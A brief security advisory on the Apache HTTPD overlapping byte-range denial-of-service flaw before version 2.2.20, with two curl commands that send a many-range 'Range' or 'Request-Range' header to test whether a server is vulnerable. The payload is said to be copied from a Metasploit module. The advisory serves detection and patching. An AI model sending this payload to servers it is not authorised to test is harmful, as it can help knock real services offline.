A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server prior to version 2.2.20:
http://seclists.org/fulldisclosure/2011/Aug/175
An attack tool is circulating in the wild. Active use of this tool has been observed.
In addition to the ‘Range’ header - the ‘Request-Range’ header is equally affected. Furthermore various vendor updates, improved regexes (speed and accommodating a different and new attack pattern).
All versions of Apache prior to version 2.2.20
curl http://<IP>/ -H "Host: <hostname>" -H "Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" -w "%{http_code}" -o /dev/null -s
OR
curl http://<IP>/ -H "Host: <hostname>" -H "Request-Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" -w "%{http_code}" -o /dev/null -s
Test Fail: Machine Vulnerable : 206
Test Pass: Machine Not Vulnerable : Any error or response other then 206
Note: Payload is a direct copy from MSF module